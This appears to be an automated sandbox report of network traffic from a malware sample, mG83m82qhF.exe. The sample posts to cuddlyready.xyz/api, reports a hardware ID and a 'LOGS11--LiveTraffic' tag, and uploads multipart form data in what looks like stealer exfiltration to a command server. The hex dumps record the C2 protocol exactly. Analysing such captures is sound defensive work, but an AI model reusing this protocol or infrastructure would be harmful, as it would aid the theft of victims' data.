                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1464&min_rtt=1455&rtt_var=564&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1910994&cwnd=246&unsent_bytes=0&cid=a2d8156e6b5890f2&ts=1028&x=0"
                                                                                                                                                                              2024-12-23 07:31:25 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                              2024-12-23 07:31:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              1192.168.2.1049715172.67.150.1734437704C:\Users\user\Desktop\mG83m82qhF.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-23 07:31:26 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 53
                                                                                                                                                                              Host: cuddlyready.xyz
                                                                                                                                                                              2024-12-23 07:31:26 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                              2024-12-23 07:31:27 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:31:27 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=bvv62nvr9hjccnk5vg9v8n11mp; expires=Fri, 18 Apr 2025 01:18:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sw1dUWobgvRpH3xUfdCwg4Fzzi61F%2B81qyGrmg6kQ3Y6FfNY4vFZ2Q5Qt%2F1Tc9zLILNDp18hxKz18bjX6O2FZj9kfJMMoHxEZLoJUquZGC2MPHdPk7qMgwqwMhnInV%2FuVk4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f66a6ecfad48c1d-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1875&min_rtt=1846&rtt_var=713&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=952&delivery_rate=1581798&cwnd=174&unsent_bytes=0&cid=45f403ae00c59927&ts=793&x=0"
                                                                                                                                                                              2024-12-23 07:31:27 UTC246INData Raw: 34 37 34 0d 0a 46 49 42 4f 69 73 33 6d 7a 4b 4c 4a 5a 33 37 37 31 56 71 53 43 31 4b 69 63 6f 4e 62 43 64 7a 44 51 6f 75 56 58 52 6a 6a 79 2b 6c 76 6f 6a 69 6f 39 39 4c 67 67 4c 6f 43 58 4d 47 68 4b 4f 64 75 66 6f 41 54 35 33 6b 7a 75 71 49 75 2b 50 42 78 4f 70 57 6d 79 79 37 6d 4c 2b 61 2b 67 2b 43 41 72 42 39 63 77 59 34 68 73 47 34 38 67 45 69 68 50 6d 4f 2b 6f 69 37 70 39 44 5a 33 6b 36 65 4b 66 4f 77 70 34 71 69 46 71 4d 4f 6c 43 68 75 65 73 44 76 34 5a 54 76 50 47 75 35 35 4a 66 36 6d 4f 4b 6d 76 66 31 57 47 76 34 68 5a 34 54 33 68 37 35 76 67 32 65 73 43 45 4e 6e 76 65 50 4e 75 4d 4d 34 55 35 7a 42 68 74 4b 73 6d 36 50 45 33 61 49 71 74 67 58 7a 69 4b 75 4f 69 6a 4c 7a 4f 72 77 30 51 6d 4c 6f 37 73 43 64 77 78 77 69 68 59
                                                                                                                                                                              Data Ascii: 474FIBOis3mzKLJZ3771VqSC1KicoNbCdzDQouVXRjjy+lvojio99LggLoCXMGhKOdufoAT53kzuqIu+PBxOpWmyy7mL+a+g+CArB9cwY4hsG48gEihPmO+oi7p9DZ3k6eKfOwp4qiFqMOlChuesDv4ZTvPGu55Jf6mOKmvf1WGv4hZ4T3h75vg2esCENnvePNuMM4U5zBhtKsm6PE3aIqtgXziKuOijLzOrw0QmLo7sCdwxwihY
                                                                                                                                                                              2024-12-23 07:31:27 UTC901INData Raw: 53 76 74 6b 79 50 34 35 69 70 33 6b 61 2f 4c 61 61 77 31 71 4b 69 49 37 70 6a 72 44 52 43 58 73 6a 76 2f 62 6a 48 41 41 75 34 35 61 4c 61 70 4a 4f 50 34 4d 48 57 50 6f 34 78 2b 36 79 76 6e 71 49 79 6f 7a 36 68 46 55 74 6d 77 49 4c 41 78 63 4f 41 41 34 6a 70 2f 73 37 42 67 39 72 6b 6d 4f 6f 61 6c 79 79 36 69 4b 75 61 75 69 61 37 53 6f 77 34 58 6e 4b 55 7a 2b 57 51 39 77 42 33 72 4e 6d 69 2b 70 69 72 6a 2b 44 56 2b 6a 4b 53 4e 64 75 4a 73 70 75 2b 44 74 6f 44 7a 52 54 2b 63 70 7a 2f 38 66 33 4c 36 55 50 35 33 63 76 36 6d 4c 4b 6d 76 66 33 4b 45 71 6f 68 39 37 53 2f 67 70 4a 61 75 30 71 30 49 47 59 75 78 50 66 35 6a 4d 39 49 61 37 7a 39 6f 74 36 6f 70 37 50 41 37 4f 73 2f 70 6a 47 36 69 64 4b 69 4f 69 61 58 4d 6f 52 49 63 32 61 68 32 36 53 6b 33 7a 46 43 35
                                                                                                                                                                              Data Ascii: SvtkyP45ip3ka/Laaw1qKiI7pjrDRCXsjv/bjHAAu45aLapJOP4MHWPo4x+6yvnqIyoz6hFUtmwILAxcOAA4jp/s7Bg9rkmOoalyy6iKuauia7Sow4XnKUz+WQ9wB3rNmi+pirj+DV+jKSNduJspu+DtoDzRT+cpz/8f3L6UP53cv6mLKmvf3KEqoh97S/gpJau0q0IGYuxPf5jM9Ia7z9ot6op7PA7Os/pjG6idKiOiaXMoRIc2ah26Sk3zFC5
                                                                                                                                                                              2024-12-23 07:31:27 UTC1369INData Raw: 34 34 61 38 0d 0a 75 47 44 75 2b 33 38 69 77 61 61 45 65 65 6f 73 36 61 75 4a 71 73 47 6d 43 52 57 61 75 7a 54 34 5a 44 7a 45 48 2b 6b 78 61 4c 61 7a 4c 75 66 78 4f 58 71 45 36 63 55 32 35 54 53 6f 39 38 53 4b 7a 72 77 52 46 39 75 43 4f 2f 35 6e 4e 39 5a 51 2f 6e 64 79 2f 71 59 73 71 61 39 2f 64 49 79 69 68 33 48 72 4c 65 75 76 6a 71 44 50 6f 51 30 55 6d 62 6f 35 2b 32 45 32 7a 52 76 75 4e 6d 79 32 6f 69 7a 73 2b 6a 77 36 7a 2b 6d 4d 62 71 4a 30 71 49 71 4b 72 64 47 36 52 79 6d 61 75 54 62 33 66 33 44 66 58 76 68 35 62 4c 4c 68 65 4b 6e 39 4f 48 32 46 70 49 46 31 35 69 6a 6c 6f 49 32 6e 79 62 6b 50 45 4a 65 6c 4e 66 70 73 50 73 77 56 37 6a 6c 71 76 36 38 71 34 72 64 78 4f 6f 61 78 79 79 36 69 41 2b 57 2f 6c 71 54 4c 75 6b 63 70 6d 72 6b 32 39 33 39 77 33
                                                                                                                                                                              Data Ascii: 44a8uGDu+38iwaaEeeos6auJqsGmCRWauzT4ZDzEH+kxaLazLufxOXqE6cU25TSo98SKzrwRF9uCO/5nN9ZQ/ndy/qYsqa9/dIyih3HrLeuvjqDPoQ0Umbo5+2E2zRvuNmy2oizs+jw6z+mMbqJ0qIqKrdG6RymauTb3f3DfXvh5bLLheKn9OH2FpIF15ijloI2nybkPEJelNfpsPswV7jlqv68q4rdxOoaxyy6iA+W/lqTLukcpmrk2939w3
                                                                                                                                                                              2024-12-23 07:31:27 UTC1369INData Raw: 72 6f 65 38 35 71 66 41 7a 4f 74 6e 70 67 58 72 6d 4c 2b 53 6d 69 4b 50 42 72 77 49 52 6e 62 63 2b 39 6d 77 78 79 78 6a 74 4e 6d 47 79 70 53 7a 67 38 54 4e 35 67 71 2f 4c 4f 4b 49 72 38 4f 2f 63 37 75 47 6d 44 68 43 5a 74 43 6e 33 4b 58 36 41 48 75 63 35 4b 2b 61 33 4d 50 37 77 49 44 53 59 36 59 78 36 6f 6e 53 6f 70 5a 61 72 7a 71 38 50 47 5a 32 37 4d 76 42 73 49 73 67 57 35 6a 56 6a 75 36 34 6d 37 50 6f 34 63 59 4b 37 6d 58 58 6d 49 75 54 76 79 75 37 48 73 30 56 45 32 5a 49 76 38 33 6b 32 77 31 44 2b 64 33 4c 2b 70 69 79 70 72 33 39 36 6a 36 57 41 63 65 6b 6e 37 4b 75 45 6f 38 75 6c 43 78 57 56 76 7a 54 33 65 7a 33 46 47 4f 73 77 62 72 4b 73 49 2f 76 30 50 6a 72 50 36 59 78 75 6f 6e 53 6f 69 4c 65 5a 34 2b 73 61 55 6f 44 33 50 2f 77 70 61 49 41 52 36 54
                                                                                                                                                                              Data Ascii: roe85qfAzOtnpgXrmL+SmiKPBrwIRnbc+9mwxyxjtNmGypSzg8TN5gq/LOKIr8O/c7uGmDhCZtCn3KX6AHuc5K+a3MP7wIDSY6Yx6onSopZarzq8PGZ27MvBsIsgW5jVju64m7Po4cYK7mXXmIuTvyu7Hs0VE2ZIv83k2w1D+d3L+piypr396j6WAcekn7KuEo8ulCxWVvzT3ez3FGOswbrKsI/v0PjrP6YxuonSoiLeZ4+saUoD3P/wpaIAR6T
                                                                                                                                                                              2024-12-23 07:31:27 UTC1369INData Raw: 62 76 43 33 4f 48 62 42 38 63 74 78 36 69 54 6d 72 49 4b 6c 7a 4b 63 45 46 5a 2b 79 4d 50 64 6d 4e 38 6b 58 34 54 39 35 75 61 77 70 36 66 77 32 63 49 57 6f 67 44 61 73 62 4f 2b 33 78 50 61 41 6d 51 49 4b 69 62 52 34 37 79 63 70 67 42 66 74 65 54 50 2b 72 44 4c 6f 38 69 31 2b 6a 71 4b 5a 66 65 51 73 37 62 32 44 6f 73 71 6b 42 68 53 55 74 44 44 69 61 54 33 41 41 76 4d 2f 59 4c 44 68 62 71 6e 77 4a 7a 72 5a 36 62 70 68 36 57 7a 33 34 5a 33 75 78 36 64 46 52 4e 6d 30 4d 76 31 6e 49 73 51 57 36 6a 70 6c 74 71 51 6f 37 66 30 79 64 59 71 6a 67 6e 37 69 49 2b 32 6e 6a 36 6a 4f 71 67 4d 51 6c 50 64 32 73 47 34 6f 67 45 69 68 48 6e 47 7a 70 7a 66 34 77 6a 68 36 30 4f 6d 55 4f 50 74 73 37 36 50 45 39 6f 43 6d 43 52 61 55 73 6a 7a 34 62 6a 50 42 48 4f 55 30 5a 72 71
                                                                                                                                                                              Data Ascii: bvC3OHbB8ctx6iTmrIKlzKcEFZ+yMPdmN8kX4T95uawp6fw2cIWogDasbO+3xPaAmQIKibR47ycpgBfteTP+rDLo8i1+jqKZfeQs7b2DosqkBhSUtDDiaT3AAvM/YLDhbqnwJzrZ6bph6Wz34Z3ux6dFRNm0Mv1nIsQW6jpltqQo7f0ydYqjgn7iI+2nj6jOqgMQlPd2sG4ogEihHnGzpzf4wjh60OmUOPts76PE9oCmCRaUsjz4bjPBHOU0Zrq
                                                                                                                                                                              2024-12-23 07:31:27 UTC1369INData Raw: 54 4a 38 67 4b 69 44 66 75 49 71 34 71 75 48 70 38 4f 73 44 42 71 53 74 44 4c 2f 62 6a 62 45 45 4f 6f 2b 5a 62 69 6b 4b 2b 43 33 63 54 71 47 73 63 73 75 6f 67 72 4c 76 5a 61 63 7a 71 67 65 58 49 62 35 49 62 42 75 50 49 42 49 6f 54 4a 6a 73 62 4d 6c 34 50 38 37 63 34 47 74 67 58 76 6c 4c 4f 32 69 67 61 72 4f 72 77 49 63 6c 62 67 2f 2b 47 59 30 77 42 2b 68 64 79 75 35 75 57 43 78 74 78 39 78 6c 34 69 46 66 66 42 73 39 2b 47 64 37 73 65 6e 52 55 54 5a 75 54 48 78 59 54 37 4d 47 4f 55 72 61 37 57 6f 4c 2b 6a 34 50 33 6d 41 6f 34 4e 6b 35 43 7a 6a 70 34 4f 6d 78 4b 55 58 48 5a 62 33 64 72 42 75 4b 49 42 49 6f 51 68 39 75 61 59 76 71 39 34 34 59 59 43 6a 69 48 33 75 62 50 66 68 6e 65 37 48 70 30 56 45 32 62 6f 30 2f 57 30 69 7a 42 44 68 4d 47 79 30 73 79 2f 6d
                                                                                                                                                                              Data Ascii: TJ8gKiDfuIq4quHp8OsDBqStDL/bjbEEOo+ZbikK+C3cTqGscsuogrLvZaczqgeXIb5IbBuPIBIoTJjsbMl4P87c4GtgXvlLO2igarOrwIclbg/+GY0wB+hdyu5uWCxtx9xl4iFffBs9+Gd7senRUTZuTHxYT7MGOUra7WoL+j4P3mAo4Nk5Czjp4OmxKUXHZb3drBuKIBIoQh9uaYvq944YYCjiH3ubPfhne7Hp0VE2bo0/W0izBDhMGy0sy/m
                                                                                                                                                                              2024-12-23 07:31:27 UTC1369INData Raw: 75 75 68 57 54 6a 4a 75 53 75 67 36 6e 4c 75 51 34 4f 6b 72 38 37 2f 6d 45 35 77 42 37 68 4f 47 61 2b 34 57 36 70 38 43 63 36 32 65 6d 75 56 66 55 36 34 75 32 6e 75 64 61 68 41 68 43 50 76 44 6e 7a 66 7a 33 51 55 4b 39 35 65 72 6d 77 59 4c 48 68 4c 32 32 47 74 73 56 76 6f 69 76 6b 37 39 7a 75 79 36 51 4c 45 5a 4b 7a 4d 66 56 68 4d 38 55 56 36 7a 56 6e 76 36 6b 70 34 2f 49 36 66 49 75 71 68 58 6e 6a 49 4f 79 6d 69 71 65 41 35 55 55 62 67 66 64 67 73 46 38 67 78 77 6a 73 4b 53 6d 4d 6f 6a 48 34 34 6a 4a 71 68 2b 75 6b 64 65 34 76 37 61 69 55 37 74 2f 6c 48 46 79 65 75 33 69 6f 4b 54 44 45 48 4f 49 2b 5a 62 47 73 4c 2b 37 38 4d 48 43 50 75 34 52 7a 36 69 44 67 6f 70 61 6b 79 72 6b 4d 46 5a 53 35 4d 4f 4a 71 63 49 35 51 35 69 45 72 35 75 45 53 34 2f 51 7a 62
                                                                                                                                                                              Data Ascii: uuhWTjJuSug6nLuQ4Okr87/mE5wB7hOGa+4W6p8Cc62emuVfU64u2nudahAhCPvDnzfz3QUK95ermwYLHhL22GtsVvoivk79zuy6QLEZKzMfVhM8UV6zVnv6kp4/I6fIuqhXnjIOymiqeA5UUbgfdgsF8gxwjsKSmMojH44jJqh+ukde4v7aiU7t/lHFyeu3ioKTDEHOI+ZbGsL+78MHCPu4Rz6iDgopakyrkMFZS5MOJqcI5Q5iEr5uES4/Qzb
                                                                                                                                                                              2024-12-23 07:31:27 UTC1369INData Raw: 7a 35 52 4c 57 6f 59 4f 36 78 36 55 44 48 4e 6e 35 65 50 38 70 61 50 6c 51 71 58 6c 55 38 4f 45 34 71 61 39 2f 54 34 4b 6e 68 58 48 30 50 61 57 4d 6b 37 6a 4b 73 45 63 36 6e 71 59 78 35 6d 51 69 67 46 36 68 50 79 76 6d 38 57 36 70 38 79 34 36 32 66 6e 5a 4c 62 64 2f 76 2f 2f 57 73 59 36 79 52 51 72 5a 37 32 71 2b 4b 53 4b 41 53 4b 46 2b 61 4b 79 7a 4a 75 72 68 50 44 32 2f 6c 36 74 39 39 43 33 6c 70 49 69 51 2f 72 34 47 45 70 65 77 4c 75 45 70 66 6f 41 66 6f 57 46 53 2f 75 6c 67 31 72 6c 2f 59 73 48 78 79 30 50 68 49 75 61 6f 6b 72 2b 4e 69 77 34 4b 6d 4c 6f 7a 2f 43 73 78 7a 51 44 6d 65 53 58 2b 70 32 43 78 70 33 45 36 68 62 6a 4c 4c 72 4a 2b 73 2f 72 58 2b 5a 44 35 47 6c 4b 41 39 79 36 77 4d 57 4b 4f 55 50 4e 35 4d 2f 37 6d 49 2f 76 6c 4f 58 6d 58 71 73
                                                                                                                                                                              Data Ascii: z5RLWoYO6x6UDHNn5eP8paPlQqXlU8OE4qa9/T4KnhXH0PaWMk7jKsEc6nqYx5mQigF6hPyvm8W6p8y462fnZLbd/v//WsY6yRQrZ72q+KSKASKF+aKyzJurhPD2/l6t99C3lpIiQ/r4GEpewLuEpfoAfoWFS/ulg1rl/YsHxy0PhIuaokr+Niw4KmLoz/CsxzQDmeSX+p2Cxp3E6hbjLLrJ+s/rX+ZD5GlKA9y6wMWKOUPN5M/7mI/vlOXmXqs
                                                                                                                                                                              2024-12-23 07:31:27 UTC1369INData Raw: 71 4b 6e 45 39 70 4c 6c 52 52 69 49 39 32 43 67 4f 32 75 56 51 37 5a 70 4f 61 48 76 4f 61 6e 68 66 79 4c 54 35 38 74 6b 6f 6e 53 6f 36 49 65 38 30 71 30 47 43 70 72 77 42 73 35 50 4d 38 63 57 34 6a 64 38 72 2b 4d 50 36 76 77 7a 64 6f 61 2f 74 55 6a 33 4c 2b 61 68 67 37 6a 52 36 30 74 63 6c 76 64 67 79 53 6b 68 79 68 65 74 63 53 65 76 73 69 37 69 34 54 67 36 76 75 66 4c 62 71 4a 30 71 4a 71 48 6f 4d 36 73 45 77 33 55 6b 54 76 33 62 7a 50 4f 42 2f 42 35 4a 66 36 6e 59 4c 47 6c 63 54 71 46 75 4d 73 75 73 6e 36 7a 2b 74 66 35 6b 50 6b 61 55 6f 44 33 4c 72 41 78 59 34 35 51 38 33 6b 7a 2f 75 59 75 35 50 59 38 64 49 4b 37 6d 58 44 68 4f 75 76 6f 75 70 44 6c 70 67 67 5a 6c 37 41 47 7a 6b 67 36 30 42 33 75 50 6c 57 41 6c 6a 48 75 35 33 31 63 67 72 2b 49 4e 71 78
                                                                                                                                                                              Data Ascii: qKnE9pLlRRiI92CgO2uVQ7ZpOaHvOanhfyLT58tkonSo6Ie80q0GCprwBs5PM8cW4jd8r+MP6vwzdoa/tUj3L+ahg7jR60tclvdgySkhyhetcSevsi7i4Tg6vufLbqJ0qJqHoM6sEw3UkTv3bzPOB/B5Jf6nYLGlcTqFuMsusn6z+tf5kPkaUoD3LrAxY45Q83kz/uYu5PY8dIK7mXDhOuvoupDlpggZl7AGzkg60B3uPlWAljHu531cgr+INqx


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              2192.168.2.1049721172.67.150.1734437704C:\Users\user\Desktop\mG83m82qhF.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-23 07:31:29 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=K9DFO6OSNV4Y2XTIIPM
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 12859
                                                                                                                                                                              Host: cuddlyready.xyz
                                                                                                                                                                              2024-12-23 07:31:29 UTC12859OUTData Raw: 2d 2d 4b 39 44 46 4f 36 4f 53 4e 56 34 59 32 58 54 49 49 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 32 33 38 35 46 34 37 43 46 46 44 45 46 35 35 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4b 39 44 46 4f 36 4f 53 4e 56 34 59 32 58 54 49 49 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 39 44 46 4f 36 4f 53 4e 56 34 59 32 58 54 49 49 50 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
                                                                                                                                                                              Data Ascii: --K9DFO6OSNV4Y2XTIIPMContent-Disposition: form-data; name="hwid"82385F47CFFDEF55AC8923850305D13E--K9DFO6OSNV4Y2XTIIPMContent-Disposition: form-data; name="pid"2--K9DFO6OSNV4Y2XTIIPMContent-Disposition: form-data; name="lid"LOGS11--Li
                                                                                                                                                                              2024-12-23 07:31:30 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:31:30 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=na0g47qbitniiou9esek1i0m9v; expires=Fri, 18 Apr 2025 01:18:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ADbfGfogkX4bte5WvYfq7MYFBKoD3Amfo1YSHIT12XAIYGdbnF3hCqn8pTfGAopCZmFX6K1SssyDwJrS8j3Tfoh945TtYJPf3CouO7KJtgWxo7%2BEbJ45Sp6nwJNfhZ6k1ys%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f66a6fc9acd43ed-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2208&min_rtt=2122&rtt_var=969&sent=9&recv=16&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13799&delivery_rate=1036563&cwnd=205&unsent_bytes=0&cid=98a481e9648499a7&ts=1281&x=0"
                                                                                                                                                                              2024-12-23 07:31:30 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                              2024-12-23 07:31:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              3192.168.2.1049727172.67.150.1734437704C:\Users\user\Desktop\mG83m82qhF.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-23 07:31:31 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=2NP6G25QLXUCTB6
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 15062
                                                                                                                                                                              Host: cuddlyready.xyz
                                                                                                                                                                              2024-12-23 07:31:31 UTC15062OUTData Raw: 2d 2d 32 4e 50 36 47 32 35 51 4c 58 55 43 54 42 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 32 33 38 35 46 34 37 43 46 46 44 45 46 35 35 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 32 4e 50 36 47 32 35 51 4c 58 55 43 54 42 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 4e 50 36 47 32 35 51 4c 58 55 43 54 42 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                                                                                              Data Ascii: --2NP6G25QLXUCTB6Content-Disposition: form-data; name="hwid"82385F47CFFDEF55AC8923850305D13E--2NP6G25QLXUCTB6Content-Disposition: form-data; name="pid"2--2NP6G25QLXUCTB6Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                                                                                                                              2024-12-23 07:31:32 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:31:32 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=9o5o4bbv35c5a0m80adbujbd00; expires=Fri, 18 Apr 2025 01:18:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qEBxo30ye7zVWImtY8IAJ2OYXmFgR4HfcrSJsnrHhr70d5vzpEbTRF9ZuwLwwMPbYsQL3b1GnfVM2IicNpbtdQT0Jhnh1LL%2BxQbb8puvoVVweOnUEf74EbBour6t9VM51t4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f66a70ccf957cea-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1784&min_rtt=1780&rtt_var=677&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2836&recv_bytes=15998&delivery_rate=1606160&cwnd=226&unsent_bytes=0&cid=cf5c46cbd4893037&ts=1171&x=0"
                                                                                                                                                                              2024-12-23 07:31:32 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                              2024-12-23 07:31:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              4192.168.2.1049733172.67.150.1734437704C:\Users\user\Desktop\mG83m82qhF.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-23 07:31:34 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=O1N2OO66DWA6
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 20406
                                                                                                                                                                              Host: cuddlyready.xyz
